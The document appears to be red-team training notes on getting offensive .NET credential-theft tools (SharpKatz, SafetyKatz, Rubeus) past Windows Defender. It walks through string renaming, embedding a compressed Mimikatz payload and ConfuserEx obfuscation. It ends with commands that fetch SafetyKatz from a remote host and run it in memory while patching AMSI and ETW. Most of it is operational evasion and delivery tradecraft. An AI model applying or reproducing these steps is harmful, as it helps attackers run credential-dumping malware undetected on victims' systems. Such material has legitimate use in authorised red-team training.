Currently, .NET lacks some of the security features implemeneted in System.Management.Automation.dll. Because of this, many Red teams have included .NET in their tradecraft.
There are many open source Offensive .NET tools and we will use the ones that fit out attack methodology.
When using .NET (or any other complied language), there are some challenges:
- Detection by countermeasures like AV, EDR, etc.
- Delivery of the payload (recall PS sweet download-execute cradles!)
- Detection by logging like Process Creation, Command-line logging, etc.
We will try and address the AV detection and delivery of the payload.
We will focus on tthe bypass of signature-based detection by Windows Defender. For that, we use techniques like:
- Obfuscation
- String Manipulation
- ...
We can use DefenderCheck to identify code and strings from a binary that Wnidows Defender may flag. This helps us in deciding on modifying the source code and minimal obfuscation.
Defender Check
To check SharpKatz.exe for signatures using Defender Check:
DefenderCheck.exe <SharpKatz.exe_path>
- As shown, it will be detected by Windows Defender
- Open the
.NETproject in Visual Studio - Press
CTRL + H - Find and replace the string
CredentialswithCredents- you can use any other string as a replacement, but make sure that string is not present in the code - Select the scope as
Entire Solution - Press
Replace Allbutton - Build and recheck the binary with DefenderCheck
- Repeat above steps if there is still a detection
For SafetyKatz.exe, do the following steps:
Download the latest version of Mimikatz (https://github.com/gentilkiwi/mimikatz) and Out-CompressedDll.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1)
Run Out-CompressedDll.ps1 on the Mimikatz binary and save the output to a file
Out-CompressedDll <path_Mimikatz.exe> > <outfile>.txt
Copy the value of the variable $EncodedCompressedFile from the output file above and replace the value of compressedMimikatzString varaible in the Constants.cs file of SafetyKatz.
Copy the byte size from the output file and replace it in Program.cs file on the line 111 and 116. Finally build and recheck the binary with DefenderCheck.
For BetterSafetyKatz, we used the following steps:
Download the latest release of mimkatz_truck.zip file. Then convert the file to base64:
Modify Program.cs:
- Added a new variable that contains the base64 value of
mimikatz_truck.zipfile - Comment the code that downloads or accepts the mimikatz file as an argument
- Convert the base64 string to bytes and pass it to
zipStreamvariable
For Rubeus.exe, we used ConfuserEx to obfuscate.
- Launch ConfuserEx
- In
Projecttab, select the Base Directory0 where the binary file is located - In
Projecttab, select the binary file that we want to obfuscate - In
Settingstab, add the rules - In
Settingstab, edit the rule and select the preset asNormal - In
Protecttab, click on the protect button
- We will find the new obfuscated binary in the
Confusedfolder under the Base Directory.
We can use NetLoader to deliver our binary payloads.
It can be used to load binary from filepath or URL and patch AMSI & ETW while executing:
C:\Users\Public\Loader.exe -Path http://192.168.100.64/SafetyKatz.exe
We also have AssemblyLoad.exe that can be used to load the Netloader in-memory from a URL which then loads a binary from a filepath or URL.
C:\Users\Public\AssemblyLoad.exe http://192.168.100.64/Loader.exe -Path http://192.168.100.64/SafetyKatz.exe